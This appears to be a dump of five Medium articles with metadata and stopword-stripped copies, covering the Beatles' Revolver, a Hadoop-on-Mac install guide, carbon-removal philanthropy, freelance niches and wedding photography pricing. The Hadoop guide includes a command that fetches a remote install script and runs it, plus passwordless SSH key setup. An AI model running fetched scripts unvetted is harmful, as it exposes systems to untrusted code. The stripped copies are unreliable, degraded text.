Revolver changed my life I was in either 7th or 8th grade, and I went to a record store to buy a Beatles album. It was also the very first time I would ever buy a record. I didn’t know much about The Beatles other than any song I heard I liked. One summer I went to day camp at The Thomas School of Horsemanship. Whenever it rained they’d set up chairs in a big barn space and show Help. I think it was the only movie the camp had, and I saw the first 40 minutes of it five times that summer. I loved the in the floor bed John Lennon had. My aunt had two cats named George and Ringo. I knew the other two Beatles were named Paul and John. And that was the extent of my Beatles knowledge. And armed with that scant knowledge I flipped through a bunch of twelve inch 33 1/3 Beatles albums, with their always interesting covers and names. Help. Hard Days Night. Meet the Beatles (in the US it was Meet the Beatles, not With the Beatles). Sgt Peppers. Magical Mystery Tour. The white one. One with no name on it but a picture of four guys with beards and long hair walking in a neighborhood across the road. And there was this weird one with a mostly white cover and line drawings of the four of them. I flipped the various albums over and looked at song titles, figuring I’d buy whatever one had the most songs I actually knew. There were crazy titles! Being For the Benefit of Mr Kite! Polyethylene Pam! Dear Prudence! The Word! I didn’t know these songs. There were so many songs I didn’t know. I couldn’t imagine what they all might sound like. On the mostly white one with the weird cover drawings I knew two songs, Eleanor Rigby and Yellow Submarine, so that was the album I bought. We had a cheap shit stereo at home and a good stereo at home. The cheap shit one was a Panasonic all-in-one with Thruster Speakers… I played the first album I ever bought on the Panasonic in the kids room downstairs in our house. We all have expectations. I knew Eleanor Rigby and Yellow Submarine, so that was what I expected Revolver to sound like. Revolver side one song one begins with some noise — some squirps and chatter, and then a voice: “One Two Three…” Suddenly, a guitar chord slams like someone dropping a metal garbage can lid, a huge bass rolls in and a weird, nasal voice announces, “Let me tell you how it will be…” “What the fuck is this?” I thought. Taxman. Good god. From there it went all around the planet and into the stars. I’d never heard anything like it. Side one ended with a short, fireball of a song called She Said She Said. It was the coolest guitar playing I’d ever heard. The drumming — there’s no words for it. It’s perfect and at the same time it sounds like someone falling down the stairs. The voice trails off at the end, overlapping and repeating, “I know what it’s like to be dead I know what it is to be sad I know what it’s like to be dead I know what it is to be sad….” She Said She Said became my official favorite Beatles song. Side one… I flipped the record over and played side two… There is nothing that can possibly… I mean… how do you even begin to talk about the last song on side 2, the last song on Revolver? How do you talk about Tomorrow Never Knows? It starts with a whine, kick ass drums, and then what sounds like a rampant army of angry lemmings fade in. Throughout it are jags of violins and orchestras, more lemmings, what sounds like a radio message from outer space that I later discovered was a backwards guitar solo, impenetrable lyrics, a bass that was one note over and over again until the whole thing spun apart into a player piano and a last violin line sucked up into a hole in the sky. It was like the world sounded different after that song. There’s STILL nothing like it. Tomorrow Never Knows is a singularly. It’s the weirdest catchy beautiful cacophony ever made. Who know what the hell it is. Heaven, hell, all places in between. Up down, left right, in out. I had sat there, my chin perched on the back of a couch with my head stuck between the speakers for 35 minutes, and I was exhausted. I laid on the floor and looked at the album jacket, the drawn and collaged front, and the photo of the band on the back. I knew this was my favorite album, and that that would never change. And I knew… I knew that I wanted to do something that I didn’t have a name for. I wanted to be in a band and play guitar and write songs — I knew all that, but there was something else. I wanted to… be part of something like Revolver. To build something like that. To make records. Records that weren’t just music. At the top back cover, above the list of songs, there was a sentence I didn’t quite understand. It said, “Recording produced by GEORGE MARTIN.” I didn’t know what it meant, but I was pretty sure it was the job description for me. I went on to produce records. Revolver was the standard and the inspiration. After my tinnitus ended thoughts of working in music I went on to direct plays, and again Revolver was there somehow. Somehow the sense of humor, experimentation, the delight, the oddness, the gorgeousness, the memorability of Revolver is always with me. After 40+ years, Revolver still clues me into the power of art, the power of music, and what it means to manifest the invisible — to do the work of the artist.
https://lukedelalio.medium.com/revolver-changed-my-life-f0b753f70901
['Luke Delalio']
2020-09-26 00:31:19.766000+00:00
['Beatles', 'Creativity', 'Revolver', 'Music']
Title Revolver changed lifeContent Revolver changed life either 7th 8th grade went record store buy Beatles album also first time would ever buy record didn’t know much Beatles song heard liked One summer went day camp Thomas School Horsemanship Whenever rained they’d set chair big barn space show Help think movie camp saw first 40 minute five time summer loved floor bed John Lennon aunt two cat named George Ringo knew two Beatles named Paul John extent Beatles knowledge armed scant knowledge flipped bunch twelve inch 33 13 Beatles album always interesting cover name Help Hard Days Night Meet Beatles US Meet Beatles Beatles Sgt Peppers Magical Mystery Tour white one One name picture four guy beard long hair walking neighborhood across road weird one mostly white cover line drawing four flipped various album looked song title figuring I’d buy whatever one song actually knew crazy title Benefit Mr Kite Polyethylene Pam Dear Prudence Word didn’t know song many song didn’t know couldn’t imagine might sound like mostly white one weird cover drawing knew two song Eleanor Rigby Yellow Submarine album bought cheap shit stereo home good stereo home cheap shit one Panasonic allinone Thruster Speakers… played first album ever bought Panasonic kid room downstairs house expectation knew Eleanor Rigby Yellow Submarine expected Revolver sound like Revolver side one song one begin noise — squirps chatter voice “One Two Three…” Suddenly guitar chord slam like someone dropping metal garbage lid huge bass roll weird nasal voice announces “Let tell be…” “What fuck this” thought Taxman Good god went around planet star I’d never heard anything like Side one ended short fireball song called Said Said coolest guitar playing I’d ever heard drumming — there’s word It’s perfect time sound like someone falling stair voice trail end overlapping repeating “I know it’s like dead know sad know it’s like dead know sad…” Said Said became official favorite Beatles song Side one… flipped record played side two… nothing possibly… mean… even begin talk last song side 2 last song Revolver talk Tomorrow Never Knows start whine kick as drum sound like rampant army angry lemming fade Throughout jag violin orchestra lemming sound like radio message outer space later discovered backwards guitar solo impenetrable lyric bass one note whole thing spun apart player piano last violin line sucked hole sky like world sounded different song There’s STILL nothing like Tomorrow Never Knows singularly It’s weirdest catchy beautiful cacophony ever made know hell Heaven hell place left right sat chin perched back couch head stuck speaker 35 minute exhausted laid floor looked album jacket drawn collaged front photo band back knew favorite album would never change knew… knew wanted something didn’t name wanted band play guitar write song — knew something else wanted to… part something like Revolver build something like make record Records weren’t music top back cover list song sentence didn’t quite understand said “Recording produced GEORGE MARTIN” didn’t know meant pretty sure job description went produce record Revolver standard inspiration tinnitus ended thought working music went direct play Revolver somehow Somehow sense humor experimentation delight oddness gorgeousness memorability Revolver always 40 year Revolver still clue power art power music mean manifest invisible — work artistTags Beatles Creativity Revolver Music
3,832
Installing Hadoop on a Mac
Is the only thing standing between you and Hadoop just trying to figure out how to install it on a Mac? A quick internet search will show you the lack of information about this fairly simple process. In this brief tutorial, I will show you how you can very easily install Hadoop 3.2.1 on a macOS Mojave (version 10.14.6) using Terminal for a single node cluster in pseudo-distributed mode. To begin, you will need to have installed several packages that need to be placed in the appropriate directories. The HomeBrew website has made this a very simple task, automatically determining what is needed on your machine, installing correct directories and symlinking their files into /user/local. Additional documentation may also be found on their website. Install HomeBrew Copy the command at the top of the page and paste into a new terminal window. You will be notified of what will be installed. Pressing RETURN initiates the process: $ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Confirm you have the correct version of java (version 8) on your machine. If it returns anything other than 1.8., be sure to install the correct version. $ java -version $ brew cask install homebrew/cask-versions/adoptopenjdk8 Install Hadoop Next, you will install the most current version of Hadoop at the path: /usr/local/Cellar/hadoop. This happens to be 3.2.1 at the time of the writing of this article: $ brew install hadoop Configure Hadoop Configuring Hadoop will take place over a few steps. A more detailed version can be found in the Apache Hadoop documentation for setting up a single node cluster. (Be sure to follow along with the correct version installed on your machine.) Updating the environment variable settings Make changes to core-, hdfs-, mapred- and yarn-site.xml files Remove password requirement (if necessary) Format NameNode Open the document containing the environment variable settings : $ cd /usr/local/cellar/hadoop/3.2.1/libexec/etc/hadoop $ open hadoop-env.sh Make the following changes to the document, save and close. Add the location for export JAVA_HOME export JAVA_HOME= “/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home” You can find this path by using the following code in the terminal window: $ /usr/libexec/java_home Replace information for export HADOOP_OPTS change export HADOOP_OPTS=”-Djava.net.preferIPv4Stack=true” to export HADOOP_OPTS = ”-Djava.net.preferIPv4Stack=true -Djava.security.krb5.realm= -Djava.security.krb5.kdc=” Make changes to core files $ open core-site.xml <configuration> <property> <name>fs.defaultFS</name> <value>hdfs://localhost:9000</value> </property> </configuration> Make changes to hdfs files $ open hdfs-site.xml <configuration> <property> <name>dfs.replication</name> <value>1</value> </property> </configuration> Make changes to mapred files $ open mapred-site.xml <configuration> <property> <name>mapreduce.framework.name</name> <value>yarn</value> </property> <property> <name>mapreduce.application.classpath</name> <value>$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/*:$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/lib/*</value> </property> </configuration> Make changes to yarn files $ open yarn-site.xml <configuration> <property> <name>yarn.nodemanager.aux-services</name> <value>mapreduce_shuffle</value> </property> <property> <name>yarn.nodemanager.env-whitelist</name> <value>JAVA_HOME,HADOOP_COMMON_HOME,HADOOP_HDFS_HOME,HADOOP_CONF_DIR,CLASSPATH_PREPEND_DISTCACHE,HADOOP_YARN_HOME,HADOOP_MAPRED_HOME</value> </property> </configuration> Remove password requirement Check if you’re able to ssh without a password before moving to the next step to prevent unexpected results when formatting the NameNode. $ ssh localhost If this does not return a last login time, use the following commands to remove the need to insert a password. $ ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa $ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys $ chmod 0600 ~/.ssh/authorized_keys Format NameNode $ cd /usr/local/cellar/hadoop/3.2.1/libexec/bin $ hdfs namenode -format A warning will tell you that a directory for logs is being created. You will be prompted to re-format filesystem in Storage Directory root. Say Y and press RETURN. Run Hadoop $ cd /usr/local/cellar/hadoop/3.2.1/libexec/sbin $ ./start-all.sh $ jps After running jps, you should have confirmation that all the parts of Hadoop have been installed and running. You should see something like this: 66896 ResourceManager 66692 SecondaryNameNode 66535 DataNode 67350 Jps 66422 NameNode67005 NodeManager Open a web browser to see your configurations for the current session. http://localhost:9870 Information about your current Hadoop session. Close Hadoop Close Hadoop when you are all done. $ ./stop-all.sh I hope this short article has helped you get over the hurdle of installing Hadoop on your macOS machine!
https://towardsdatascience.com/installing-hadoop-on-a-mac-ec01c67b003c
['Siphu Langeni']
2020-04-02 02:37:52.066000+00:00
['Data Science', 'Hadoop', 'Data Engineering', 'Big Data', 'Mac Os X']
Title Installing Hadoop MacContent thing standing Hadoop trying figure install Mac quick internet search show lack information fairly simple process brief tutorial show easily install Hadoop 321 macOS Mojave version 10146 using Terminal single node cluster pseudodistributed mode begin need installed several package need placed appropriate directory HomeBrew website made simple task automatically determining needed machine installing correct directory symlinking file userlocal Additional documentation may also found website Install HomeBrew Copy command top page paste new terminal window notified installed Pressing RETURN initiate process usrbinruby e curl fsSL httpsrawgithubusercontentcomHomebrewinstallmasterinstall Confirm correct version java version 8 machine return anything 18 sure install correct version java version brew cask install homebrewcaskversionsadoptopenjdk8 Install Hadoop Next install current version Hadoop path usrlocalCellarhadoop happens 321 time writing article brew install hadoop Configure Hadoop Configuring Hadoop take place step detailed version found Apache Hadoop documentation setting single node cluster sure follow along correct version installed machine Updating environment variable setting Make change core hdfs mapred yarnsitexml file Remove password requirement necessary Format NameNode Open document containing environment variable setting cd usrlocalcellarhadoop321libexecetchadoop open hadoopenvsh Make following change document save close Add location export JAVAHOME export JAVAHOME “LibraryJavaJavaVirtualMachinesadoptopenjdk8jdkContentsHome” find path using following code terminal window usrlibexecjavahome Replace information export HADOOPOPTS change export HADOOPOPTS”DjavanetpreferIPv4Stacktrue” export HADOOPOPTS ”DjavanetpreferIPv4Stacktrue Djavasecuritykrb5realm Djavasecuritykrb5kdc” Make change core file open coresitexml configuration property namefsdefaultFSname valuehdfslocalhost9000value property configuration Make change hdfs file open hdfssitexml configuration property namedfsreplicationname value1value property configuration Make change mapred file open mapredsitexml configuration property namemapreduceframeworknamename valueyarnvalue property property namemapreduceapplicationclasspathname valueHADOOPMAPREDHOMEsharehadoopmapreduceHADOOPMAPREDHOMEsharehadoopmapreducelibvalue property configuration Make change yarn file open yarnsitexml configuration property nameyarnnodemanagerauxservicesname valuemapreduceshufflevalue property property nameyarnnodemanagerenvwhitelistname valueJAVAHOMEHADOOPCOMMONHOMEHADOOPHDFSHOMEHADOOPCONFDIRCLASSPATHPREPENDDISTCACHEHADOOPYARNHOMEHADOOPMAPREDHOMEvalue property configuration Remove password requirement Check you’re able ssh without password moving next step prevent unexpected result formatting NameNode ssh localhost return last login time use following command remove need insert password sshkeygen rsa P f sshidrsa cat sshidrsapub sshauthorizedkeys chmod 0600 sshauthorizedkeys Format NameNode cd usrlocalcellarhadoop321libexecbin hdfs namenode format warning tell directory log created prompted reformat filesystem Storage Directory root Say press RETURN Run Hadoop cd usrlocalcellarhadoop321libexecsbin startallsh jps running jps confirmation part Hadoop installed running see something like 66896 ResourceManager 66692 SecondaryNameNode 66535 DataNode 67350 Jps 66422 NameNode67005 NodeManager Open web browser see configuration current session httplocalhost9870 Information current Hadoop session Close Hadoop Close Hadoop done stopallsh hope short article helped get hurdle installing Hadoop macOS machineTags Data Science Hadoop Data Engineering Big Data Mac Os X
3,833
How philanthropy can help to scale carbon removal
To be clear, we are not suggesting that more mature solutions merit less support — rather, forestry, BECCS, and DAC simply require different types of support concomitant with their relative level of technological readiness. For instance, funding for communications is required to socialize the understanding that not all removal equates to BECCS, and that direct air capture is poised for rapid cost reductions as it will benefit from learning by doing and economies of scale (much in the same way as solar photovoltaics continually beat expert forecasts on price declines and capacity additions). However, we will focus this discussion on several less-heralded carbon removal solutions: enhanced weathering, soil carbon sequestration, and ocean removal approaches. Many of these solutions still have major question marks that philanthropic funding can help answer in order to drive their development forward. Enhanced weathering: Over geologic time scales, the natural weathering of rocks containing certain minerals — like serpentine, silicates, carbonates, and oxides — draws down carbon dioxide from the atmosphere and stores it in stable mineral forms, thereby playing an important role in regulating atmospheric CO2 concentrations. The centuries and millennia that these reactions typically take are too slow to help with the climate crisis. Fortunately, there are ways of safely speeding up the weathering. By grinding up rocks to increase their reactive surface area or by adding heat or acids to speed up reaction rates, enhanced weathering could be an important climate solution with huge potential to scale. (Experts estimate that, after considering energy requirements, enhanced weathering could reasonably remove up to 4 gigatons of carbon per year.) Philanthropy can support basic research to substantiate these claims in the real world, focusing on supporting process improvements and mapping resource potentials. If the benefits of enhanced weathering prove to exceed the challenges, the near-term research efforts funded by philanthropy can help unlock greater government RD&D and help secure private capital to move this approach from the lab to pilots. Soil carbon sequestration: Soils have the potential to store carbon at scale, though global soils have historically lost an estimated 133 Gt of carbon due to human-driven land use change. Today, there are a wide variety of land management strategies, practices, and technologies that fall under the aegis of soil carbon sequestration that can restore a portion of this lost carbon. However, there is no one-size fits all system that can help realize that scale. The efficacy of these practices turns on local soil type, climatic factors, and crop type. Philanthropy has been and should continue to fund research to better answer basic questions around which practices are most effective in what scenarios and how permanent the removal is. In addition to practice change, research to explore new varieties and crop types that sequester more carbon will be critical. For example, we are learning that switching to crop types with long roots, such as kernza, may support even greater soil carbon storage potential than can be realized through land management practice changes alone. There is also currently no streamlined, consistent, and cost-effective way to measure and verify soil carbon sequestration on the farm-level. This lack of protocols could greatly influence our assessment of soil carbon sequestration potential and hinder the incorporation of these practices into climate policy frameworks. Philanthropy can play a big role in incentivizing streamlining among current standards and in helping to set up the frameworks of the future. Sequestration efforts should also be combined with efforts to boost crop yields, allowing us to both store more carbon in the soil, prepare our food systems for the effects of a changing climate, and free up additional land for high-carbon ecosystems (such as forests and wetlands). Increasingly, land will be stretched to deliver on multiple priorities — from food production to ecosystem services to bioenergy production to carbon sequestration — and philanthropy can play an important coordination and consolidation role among these veins of research. Ocean approaches: There are a number of ocean-based approaches that haven’t been explored in detail to-date. In fact, the National Academy of Sciences excluded ocean approaches (except coastal wetland restoration) in their recent landmark report. These approaches utilize ocean ecosystems to sequester carbon and can include direct ocean capture, kelp farming, ocean alkalinity enhancement, and other blue carbon approaches. Because many of these strategies are in the early stages of development today, it will be important for philanthropy to support analyses to better understand the technical and economic potential for these solutions, as well as any risks from early deployment that would necessitate governance standards in the near term. There are a number of ocean-based approaches to carbon removal that haven’t been explored in detail to-date, including kelp farming. Photo: Shane Stagner Climate philanthropy is in a unique position to accelerate progress on carbon removal and increase the odds that multiple removal approaches reach gigaton scale before 2050. Our theory of change is rooted in our abilities and limitations. Philanthropy can support research (both into technical aspects and communications and messaging strategies), fund advocacy, policy development, and governance frameworks, and take on risks that governments or the private sector can’t or won’t. However, philanthropic resources are small relative to the many trillions in public and private capital that will ultimately need to be allocated toward climate solutions. Thus, any credible strategy from philanthropy should be focused on removing barriers and unlocking other forms of capital. The task ahead is daunting, and we are clear-eyed about what Paris-compatibility will entail — multiple simultaneous transformations in the ways that we produce, transport, and consume. Carbon removal is not a stand-alone task, but must be integrated into the larger economic and ecological systems they are deployed into. There are some carbon removal approaches that we know will have multiple benefits and can scale — these we should begin supporting through communications, policy development, advocacy, and investment. There are also many other approaches where it is too early to tell if they will be able to contribute to large-scale removal — but the urgency of the problem demands that we explore all options that hold the promise of arresting and reversing the climate crisis.
https://carbon180.medium.com/2050-priorities-for-climate-action-how-philanthropy-can-help-to-scale-carbon-removal-c0ac667361e6
[]
2019-06-05 20:13:10.407000+00:00
['Climate Change', 'Philanthropy', 'Future', 'Technology', 'Science']
Title philanthropy help scale carbon removalContent clear suggesting mature solution merit le support — rather forestry BECCS DAC simply require different type support concomitant relative level technological readiness instance funding communication required socialize understanding removal equates BECCS direct air capture poised rapid cost reduction benefit learning economy scale much way solar photovoltaics continually beat expert forecast price decline capacity addition However focus discussion several lessheralded carbon removal solution enhanced weathering soil carbon sequestration ocean removal approach Many solution still major question mark philanthropic funding help answer order drive development forward Enhanced weathering geologic time scale natural weathering rock containing certain mineral — like serpentine silicate carbonate oxide — draw carbon dioxide atmosphere store stable mineral form thereby playing important role regulating atmospheric CO2 concentration century millennium reaction typically take slow help climate crisis Fortunately way safely speeding weathering grinding rock increase reactive surface area adding heat acid speed reaction rate enhanced weathering could important climate solution huge potential scale Experts estimate considering energy requirement enhanced weathering could reasonably remove 4 gigatons carbon per year Philanthropy support basic research substantiate claim real world focusing supporting process improvement mapping resource potential benefit enhanced weathering prove exceed challenge nearterm research effort funded philanthropy help unlock greater government RDD help secure private capital move approach lab pilot Soil carbon sequestration Soils potential store carbon scale though global soil historically lost estimated 133 Gt carbon due humandriven land use change Today wide variety land management strategy practice technology fall aegis soil carbon sequestration restore portion lost carbon However onesize fit system help realize scale efficacy practice turn local soil type climatic factor crop type Philanthropy continue fund research better answer basic question around practice effective scenario permanent removal addition practice change research explore new variety crop type sequester carbon critical example learning switching crop type long root kernza may support even greater soil carbon storage potential realized land management practice change alone also currently streamlined consistent costeffective way measure verify soil carbon sequestration farmlevel lack protocol could greatly influence assessment soil carbon sequestration potential hinder incorporation practice climate policy framework Philanthropy play big role incentivizing streamlining among current standard helping set framework future Sequestration effort also combined effort boost crop yield allowing u store carbon soil prepare food system effect changing climate free additional land highcarbon ecosystem forest wetland Increasingly land stretched deliver multiple priority — food production ecosystem service bioenergy production carbon sequestration — philanthropy play important coordination consolidation role among vein research Ocean approach number oceanbased approach haven’t explored detail todate fact National Academy Sciences excluded ocean approach except coastal wetland restoration recent landmark report approach utilize ocean ecosystem sequester carbon include direct ocean capture kelp farming ocean alkalinity enhancement blue carbon approach many strategy early stage development today important philanthropy support analysis better understand technical economic potential solution well risk early deployment would necessitate governance standard near term number oceanbased approach carbon removal haven’t explored detail todate including kelp farming Photo Shane Stagner Climate philanthropy unique position accelerate progress carbon removal increase odds multiple removal approach reach gigaton scale 2050 theory change rooted ability limitation Philanthropy support research technical aspect communication messaging strategy fund advocacy policy development governance framework take risk government private sector can’t won’t However philanthropic resource small relative many trillion public private capital ultimately need allocated toward climate solution Thus credible strategy philanthropy focused removing barrier unlocking form capital task ahead daunting cleareyed Pariscompatibility entail — multiple simultaneous transformation way produce transport consume Carbon removal standalone task must integrated larger economic ecological system deployed carbon removal approach know multiple benefit scale — begin supporting communication policy development advocacy investment also many approach early tell able contribute largescale removal — urgency problem demand explore option hold promise arresting reversing climate crisisTags Climate Change Philanthropy Future Technology Science
3,834
To Find a Niche, Stop Looking
The niche issue would always leave people confused. The point of focusing on one theme for your content can be horrifying. How can you forget other topics or specialties and focus on one thing alone? Doesn’t it mean that you’re limiting yourself to fewer people? Doesn’t that mean less money? These are the questions that go through your mind when it comes to picking a niche, but as Pat Flynn says it best: There are riches in the niches. To charge more, you have to niche down. Nobody takes generalists seriously. You wouldn’t feel safe at a Doctor who can claim to know how to treat every part of your body — you would want to work with a specialist. The same thing goes with your clients. They wouldn’t like to work with a freelancer who claims to be an expert in everything because you cannot give your 100% to several things. I remember when I was writing the content for my website (it’s now live by the way), and I wanted to create content for the service page. Initially, I tried to include all the things I know how to do. I wanted to write — landing pages, emails, sales letters, sales brochure copies, ebook writing, SEO, and social media management services. In the agencies I work for, I do all of these, so I’m pretty experienced in them. But I wanted to include what I was best at and what came to me easily. Before now, I’ve had clients commend me on how well I use storytelling to make their blog posts and emails more engaging. I figured out that I easily come up with content for blogs and emails, but the others seemed more challenging (I still delivered good results though) I just included the two skills I was best at and used it as main service offerings — and I’ve been going on with them. I see it a lot on freelancing marketplaces how people include many skills on their profile. Although I can understand the mindset behind it is to attract a broader range of clients, but it shouldn’t be so because specialty is essential. You have to specialize in something to be able to charge premium fees. Everybody has that thing they do effortlessly, which other people will complain about how difficult it is. Writing is that thing for me. And within writing, there are sub-niches. I picked blog posts and emails as my specialty because I’m good at using stories to improve content engagement. I cringe when I write some technical pieces that don’t have any flair because it’s simply not me. I understand this, so naturally, I’d have to lean towards what I’m best at.
https://medium.com/change-your-mind/to-find-a-niche-stop-looking-f06c848478f2
['Tochukwu Okoro E.']
2020-06-26 11:47:11.899000+00:00
['Inspiration', 'Freelancing', 'Writing Tips', 'Creativity', 'Writing']
Title Find Niche Stop LookingContent niche issue would always leave people confused point focusing one theme content horrifying forget topic specialty focus one thing alone Doesn’t mean you’re limiting fewer people Doesn’t mean le money question go mind come picking niche Pat Flynn say best rich niche charge niche Nobody take generalist seriously wouldn’t feel safe Doctor claim know treat every part body — would want work specialist thing go client wouldn’t like work freelancer claim expert everything cannot give 100 several thing remember writing content website it’s live way wanted create content service page Initially tried include thing know wanted write — landing page email sale letter sale brochure copy ebook writing SEO social medium management service agency work I’m pretty experienced wanted include best came easily I’ve client commend well use storytelling make blog post email engaging figured easily come content blog email others seemed challenging still delivered good result though included two skill best used main service offering — I’ve going see lot freelancing marketplace people include many skill profile Although understand mindset behind attract broader range client shouldn’t specialty essential specialize something able charge premium fee Everybody thing effortlessly people complain difficult Writing thing within writing subniches picked blog post email specialty I’m good using story improve content engagement cringe write technical piece don’t flair it’s simply understand naturally I’d lean towards I’m best atTags Inspiration Freelancing Writing Tips Creativity Writing
3,835
How Much Should a First Time Wedding Photographer Cost?
Last Updated: August 9th, 2019 The average price range we would expect a first time wedding photographer to charge for their services is between $0 — $1,000. Some photographers looking for their absolute first wedding experience may be willing to shoot for free in exchange for “exposure” and the ability to build their wedding photography portfolio. On the other hand, some photographers will deem their time worth something monetary, but will still want to offer highly discounted services to be competitive with other established photographers in the marketplace. There is no hard and fast rule on any of this. Our opinion is based on our own personal experience pricing our wedding photography services and seeing the starting rates that were charged by other photographers around the web and in our circle of friends. If you’re here just for the hard numbers, you have them already! If you want some more detail about why we feel a first time wedding photographer will fall in the $0 — $1,000 price range — we’re going to cover that in more detail now. The Photography Intern vs. the Photography Professional No matter what job a person is choosing to work, there will be some level of a learning curve. The best wedding photographers will normally have the opportunity to assist, shadow, and second shoot with other already established wedding photographers to get a taste of the work without having to fully invest themselves into the responsibilities of the job. We often think of starting photographers as the “interns” of the wedding industry in much the same way a person would intern to be a teacher, counselor, etc. While the idea of an “unpaid intern” seems to be getting less common (at least in the United States), it still remains one potential route. The idea here is that this intern is receiving compensation in the form of experience — and that may be sufficient compensation for some. This is just the simple fact — and while many photographers (and frankly — creatives working in virtually any industry) will object to the idea of “working for exposure”, we can at least understand the logic behind it. What working for “exposure” actually results in Okay — just because we can make sense of working for exposure, we don’t really agree with it in principal. This is especially true in the field of wedding photography — which is very high pressure and high stress at times. As an outsider looking in, it may seem easy enough — a person taking pictures of people getting married. In practice, though, there’s a lot more to it. The need for communication and designing effective logistics of the wedding day are all just a few things outside of “photography” we do. Some of the earliest shoots we did were for free and with exposure being an incentive. While growing our portfolio was beneficial, the exposure never really translated into anything tangible. We rarely would receive referrals of new business from these shoots. While we benefited from the hands on experience (and maybe for some this is enough!), that was about the extent of our benefit. Every wedding photographer, new or experienced, has to make the decision of what their time is worth. For those just starting out, working for free to get that little bit of experience may be okay, and that’s a fine decision if you go that route. For us — our time is valuable, and free is never an option anymore (save maybe for shooting photos through a charity like Now I Lay Me Down to Sleep). A wedding photographers’ job is not just 8 hours on a single wedding day. In practice, every booking we have results in at least 40–80 hours of work — an engagement shoot, wedding day shooting, photo editing, email communications, in person meetings, assembling a timeline, etc. Whether you are a photographer trying to figure out your pricing, or a prospective client looking to figure out how much you should be expecting to pay — we challenge you to keep this in mind. The wedding photographers you are looking at (or maybe comparing yourself too in some ways) are people too, and they probably put a ton more into their job then you realize. They should be paid accordingly — and they get to dictate their value. If that value is free for the first client — then fine, let them do it. If it’s $500 — then rad, let them do it. If they decide to take a giant leap and maybe already have a lot of photography experience in other niches, then by all means they can jump in at a higher price point. But make no mistake about it: exposure doesn’t = compensation. Rarely does the promise of exposure pay off. Money = Real Compensation The defining feature of a professional wedding photographer is they will charge money (any amount) for their services. As we started to charge to shoot weddings and other sessions, we began to approach things as a business instead of someone just dabbling in what is virtually a new hobby. The money we made we invested again and again into new camera gear, professional services to make our workflows better and give our clients better experiences, and over time — allow us to do things with money on a personal level like travel more. We think it’s entirely reasonable if a person is just starting in in this industry to get their feet wet with little or no financial incentive, but that is not a sustainable way of living. Our efforts have value — even if they are ultimately artistic pursuits. If you’re a newbie wedding photographer, consider charging even $50 for your first wedding. If you don’t have the photography portfolio established, at least make people value your time and efforts. If you’re a potential client looking for a wedding photographer on the cheap, be willing to spend at least a little bit of money on someone who will be present and documenting one of the most important days of your life. If the photographer is against charging you, considering dropping them a tip at the end of the night as a way of saying thanks for their time. 3 Benefits of Hiring a First Time Wedding Photographer 1). Lower costs for clients on a budget. For people looking to hire a wedding photographer without a lot of extra spending money, those photographers just starting out are going to be a good match. While they won’t have the level of experience of portfolio to support them, they can still be great to work with and capture the day. When we got married back in 2016, we were on a tight budget for our wedding. While wedding photography was important for us — at the time, affording a $5,000 photographer wasn’t in the cards as we struggled to even keep our rented house heated — even if we love and respect the work of the people we saw. We ended up finding a great photographer who was starting out, had a rocking time, love our photos, and still stay connected as we’ve had the opportunity to see her grow her wedding photo business. Related: 2). Creating opportunities for the photographer. The photography industry is filled with a lot of people available to take on work. Often, the hardest part is getting the first gig or two. As a client, giving someone a chance to make their dreams come true is a huge deal. Obviously, you will want to be sure you click with the person and they seem like they can come through (within reason) on what you are wanting — but this is a great side effect. 3). They will bring an unrestricted point of view to your wedding. It’s easy for wedding photographers who have done dozens (or hundreds) of weddings to get into a simple mindset of doing the same things over and over. Don’t get us wrong — there is definitely value to that sort of approach in some situations, but it can just as easy turn into cynicism and a bad case of “honing it in” just to get some shots done. Beginner photographers will often be a lot more unhinged. They’re more excited to take great photos, and have a really great time doing it since it won’t feel like work just yet. Photographing one wedding is a lot different than photographing your 60th — we can tell you that! 3 Downsides of Hiring a First Time Wedding Photographer 1). They lack experience. After the wedding day is over, it’s really easy to tell the good wedding photographers from the bad ones. As we’ve pointed out, not all beginner photographers will be bad — but we can say they will lack the experience that is sometimes necessary to navigate wedding days successfully. You might be thinking — weddings aren’t that hard!! Sure — some of them are not. But others throw curveballs with schedules being thrown off, family & friends of the B&G stirring up drama, and so on. A photographer with a lot of wedding experience will be able to better adapt and get the shots that are needed. More than this — they will be able to predict these types of things as well. 2). They lack organization. We look back at our earliest weddings and realize — “wow, we were pretty disorganized!” We struggled with figuring out the flow of the day, communicating effectively with clients, and even just finding our way around wedding venues. Since then, our approach has become much more refined and, well, professional. Now we start to get organized before many of our clients even book with us. We get all the info we need upfront. We send out a wedding questionnaire about a month in advance and put together a timeline to help our clients get on the same page as us for the flow of their day. Little things like these go a long way to creating organization pro-actively. 3). They won’t have the best gear to back them up. The honest truth is, budget photographers will be photographing on budget gear. We mentioned in this post that we shot our first weddings on a Canon Rebel camera — a good beginner camera, but not really one that is up to the task of making professional images in any consistent fashion. The (obvious) reason for this is because professional camera gear costs money. If a wedding photographer isn’t being paid enough to afford this type of equipment, how can they take really great photos? Because the actual costs can often feel intangible, we can tell you we’ve spent over $30,000 on camera gear to help us support the creation of high quality and beautiful images in any environment. Budget gear can work when conditions are right, but once you enter a low light or imperfect lighting environment, it becomes harder and harder to get good images. If anything is true about wedding photography, it’s that consistency should be one of the goals. If you’re an aspiring wedding photographer and need help getting the right camera, lenses, etc. — check out our Recommended Gear pages right now! Your Thoughts? So — what do you think? Is the price range of $0 — $1,000 reasonable in your mind for a first time wedding photographer? Why or why not? We’d like to hear your thoughts and let this run into a good discussion on the topic. We know that many people have opinions including established photographers, prospective clients trying to figure out what is a normal rate to be paying, and the first time photographers themselves! Let us know which camp you fall into, too!
https://medium.com/swlh/how-much-should-a-first-time-wedding-photographer-cost-7f9ecb67706d
['Chris Romans']
2019-08-09 22:41:18.156000+00:00
['Freelancing', 'Business', 'Photography', 'Startup', 'Entrepreneurship']
